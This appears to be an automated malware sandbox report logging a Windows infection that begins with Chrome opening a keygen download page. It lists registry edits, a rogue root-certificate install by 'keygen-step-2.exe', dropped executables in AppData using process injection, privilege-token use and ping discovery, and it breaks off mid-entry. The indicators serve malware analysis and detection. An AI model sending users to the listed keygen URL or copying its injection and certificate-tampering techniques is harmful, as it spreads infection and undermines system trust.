Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-0876022 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState\EdpCleanupState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "1072"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\MigrationTime = 301bd569d72dd701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 9b371636f735d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionIn = "{ACD68104-AE34-45A6-AD55-D3D9EE9C4B22}"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{509A7326-C45B-477E-A151-3036316530DC}\ProgID	Free.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = cea8a527f735d701	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

keygen-step-2.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	keygen-step-2.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	keygen-step-2.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

680 PING.EXE
2316 PING.EXE
5656 PING.EXE

pid	process
680	PING.EXE
2316	PING.EXE
5656	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exerundll32.exesvchost.exeWerFault.exekey.exe1025963.exechrome.exechrome.exeultramediaburner.tmpchrome.exefilee.exechrome.exe

pid	process
2804	chrome.exe
2804	chrome.exe
1016	chrome.exe
1016	chrome.exe
5064	chrome.exe
5064	chrome.exe
4876	chrome.exe
4876	chrome.exe
4948	chrome.exe
4948	chrome.exe
3976	chrome.exe
3976	chrome.exe
4132	chrome.exe
4132	chrome.exe
1800	chrome.exe
1800	chrome.exe
4752	chrome.exe
4752	chrome.exe
2748	rundll32.exe
2748	rundll32.exe
2908	svchost.exe
2908	svchost.exe
3980	WerFault.exe
3980	WerFault.exe
3980	WerFault.exe
3980	WerFault.exe
3980	WerFault.exe
3980	WerFault.exe
3980	WerFault.exe
3980	WerFault.exe
3980	WerFault.exe
3980	WerFault.exe
3980	WerFault.exe
3980	WerFault.exe
3980	WerFault.exe
3980	WerFault.exe
3980	WerFault.exe
3980	WerFault.exe
3980	WerFault.exe
3980	WerFault.exe
3980	WerFault.exe
3980	WerFault.exe
3980	WerFault.exe
2908	svchost.exe
2908	svchost.exe
4644	key.exe
4644	key.exe
4160	1025963.exe
4160	1025963.exe
4160	1025963.exe
4280	chrome.exe
4280	chrome.exe
4000	chrome.exe
4000	chrome.exe
4200	ultramediaburner.tmp
4200	ultramediaburner.tmp
940	chrome.exe
940	chrome.exe
5168	filee.exe
5168	filee.exe
6128	chrome.exe
6128	chrome.exe
5168	filee.exe
5168	filee.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2888

pid	process
2888

Suspicious behavior: MapViewOfSection 64 IoCs

Processes:

MicrosoftEdgeCP.exeMicrosoftEdgeCP.exekabo.exeexplorer.exeiwhuvbsiwhuvbs

pid	process
5700	MicrosoftEdgeCP.exe
5700	MicrosoftEdgeCP.exe
4784	MicrosoftEdgeCP.exe
5940	kabo.exe
4784	MicrosoftEdgeCP.exe
4784	MicrosoftEdgeCP.exe
2888
2888
2888
2888
2888
2888
2888
2888
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
2888
2888
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
2888
2888
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6908	iwhuvbs
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6908	iwhuvbs
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe
6676	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

rundll32.exesvchost.exeJoSetp.exeWerFault.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	2748	rundll32.exe
Token: SeDebugPrivilege	2748	rundll32.exe
Token: SeTcbPrivilege	2908	svchost.exe
Token: SeDebugPrivilege	2748	rundll32.exe
Token: SeDebugPrivilege	2748	rundll32.exe
Token: SeDebugPrivilege	2748	rundll32.exe
Token: SeDebugPrivilege	2748	rundll32.exe
Token: SeDebugPrivilege	2748	rundll32.exe
Token: SeDebugPrivilege	2748	rundll32.exe
Token: SeDebugPrivilege	2748	rundll32.exe
Token: SeDebugPrivilege	2748	rundll32.exe
Token: SeDebugPrivilege	2748	rundll32.exe
Token: SeDebugPrivilege	2748	rundll32.exe
Token: SeDebugPrivilege	2748	rundll32.exe
Token: SeDebugPrivilege	3836	JoSetp.exe
Token: SeRestorePrivilege	3980	WerFault.exe
Token: SeBackupPrivilege	3980	WerFault.exe
Token: SeAssignPrimaryTokenPrivilege	2788	svchost.exe
Token: SeIncreaseQuotaPrivilege	2788	svchost.exe
Token: SeSecurityPrivilege	2788	svchost.exe
Token: SeTakeOwnershipPrivilege	2788	svchost.exe
Token: SeLoadDriverPrivilege	2788	svchost.exe
Token: SeSystemtimePrivilege	2788	svchost.exe
Token: SeBackupPrivilege	2788	svchost.exe
Token: SeRestorePrivilege	2788	svchost.exe
Token: SeShutdownPrivilege	2788	svchost.exe
Token: SeSystemEnvironmentPrivilege	2788	svchost.exe
Token: SeUndockPrivilege	2788	svchost.exe
Token: SeManageVolumePrivilege	2788	svchost.exe
Token: SeDebugPrivilege	3980	WerFault.exe
Token: SeAssignPrimaryTokenPrivilege	2788	svchost.exe
Token: SeIncreaseQuotaPrivilege	2788	svchost.exe
Token: SeSecurityPrivilege	2788	svchost.exe
Token: SeTakeOwnershipPrivilege	2788	svchost.exe
Token: SeLoadDriverPrivilege	2788	svchost.exe
Token: SeSystemtimePrivilege	2788	svchost.exe
Token: SeBackupPrivilege	2788	svchost.exe
Token: SeRestorePrivilege	2788	svchost.exe
Token: SeShutdownPrivilege	2788	svchost.exe
Token: SeSystemEnvironmentPrivilege	2788	svchost.exe
Token: SeUndockPrivilege	2788	svchost.exe
Token: SeManageVolumePrivilege	2788	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2788	svchost.exe
Token: SeIncreaseQuotaPrivilege	2788	svchost.exe
Token: SeSecurityPrivilege	2788	svchost.exe
Token: SeTakeOwnershipPrivilege	2788	svchost.exe
Token: SeLoadDriverPrivilege	2788	svchost.exe
Token: SeSystemtimePrivilege	2788	svchost.exe
Token: SeBackupPrivilege	2788	svchost.exe
Token: SeRestorePrivilege	2788	svchost.exe
Token: SeShutdownPrivilege	2788	svchost.exe
Token: SeSystemEnvironmentPrivilege	2788	svchost.exe
Token: SeUndockPrivilege	2788	svchost.exe
Token: SeManageVolumePrivilege	2788	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2788	svchost.exe
Token: SeIncreaseQuotaPrivilege	2788	svchost.exe
Token: SeSecurityPrivilege	2788	svchost.exe
Token: SeTakeOwnershipPrivilege	2788	svchost.exe
Token: SeLoadDriverPrivilege	2788	svchost.exe
Token: SeSystemtimePrivilege	2788	svchost.exe
Token: SeBackupPrivilege	2788	svchost.exe
Token: SeRestorePrivilege	2788	svchost.exe
Token: SeShutdownPrivilege	2788	svchost.exe
Token: SeSystemEnvironmentPrivilege	2788	svchost.exe

Suspicious use of FindShellTrayWindow 16 IoCs

Processes:

chrome.exechrome.exeultramediaburner.tmpirecord.tmp

pid	process
1016	chrome.exe
1016	chrome.exe
1016	chrome.exe
1016	chrome.exe
1016	chrome.exe
1016	chrome.exe
1016	chrome.exe
1016	chrome.exe
1016	chrome.exe
1016	chrome.exe
1016	chrome.exe
1016	chrome.exe
4000	chrome.exe
4000	chrome.exe
4200	ultramediaburner.tmp
6056	irecord.tmp

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

Free.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exe

pid	process
4716	Free.exe
4716	Free.exe
5436	MicrosoftEdge.exe
5700	MicrosoftEdgeCP.exe
5700	MicrosoftEdgeCP.exe
4496	MicrosoftEdge.exe
4784	MicrosoftEdgeCP.exe
4784	MicrosoftEdgeCP.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid process

2888

pid	process
2888

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 1016 wrote to memory of 2148	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2148	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2584	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2804	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 2804	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 3188	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 3188	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 3188	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 3188	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 3188	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 3188	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 3188	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 3188	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 3188	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 3188	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 3188	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 3188	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 3188	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 3188	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 3188	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 3188	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 3188	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 3188	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 3188	1016	chrome.exe	chrome.exe
PID 1016 wrote to memory of 3188	1016	chrome.exe	chrome.exe

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1384

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2520

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2824

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2788

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2780

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2536

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1948

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1428

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1192

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1104

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:60

C:\Users\Admin\AppData\Roaming\iwhuvbs
C:\Users\Admin\AppData\Roaming\iwhuvbs
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:6668

C:\Users\Admin\AppData\Roaming\iwhuvbs
"C:\Users\Admin\AppData\Roaming\iwhuvbs"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6908

C:\Users\Admin\AppData\Roaming\iwhuvbs
C:\Users\Admin\AppData\Roaming\iwhuvbs
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1372

C:\Users\Admin\AppData\Roaming\iwhuvbs
"C:\Users\Admin\AppData\Roaming\iwhuvbs"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6908

C:\Users\Admin\AppData\Roaming\iwhuvbs
C:\Users\Admin\AppData\Roaming\iwhuvbs
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4216

C:\Users\Admin\AppData\Roaming\iwhuvbs
"C:\Users\Admin\AppData\Roaming\iwhuvbs"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
PID:6708

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:1004

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://keygenit.com/d/8550ceeb125094q2480.html
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1016

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ffcca524f50,0x7ffcca524f60,0x7ffcca524f70
2⤵
PID:2148

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1552 /prefetch:2
2⤵
PID:2584

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1808 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2804

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2244 /prefetch:8
2⤵
PID:3188

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2876 /prefetch:1
2⤵
PID:3256

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2884 /prefetch:1
2⤵
PID:3052

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
2⤵
PID:2756

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3576 /prefetch:1
2⤵
PID:3808

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3652 /prefetch:1
2⤵
PID:3948

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
2⤵
PID:4128

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1528,1785498929519731699,14456097394370238018,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4868 /prefetch:8
2⤵
PID:4548

C:\Program Files\Google\Chrome\Application\chrome.exe
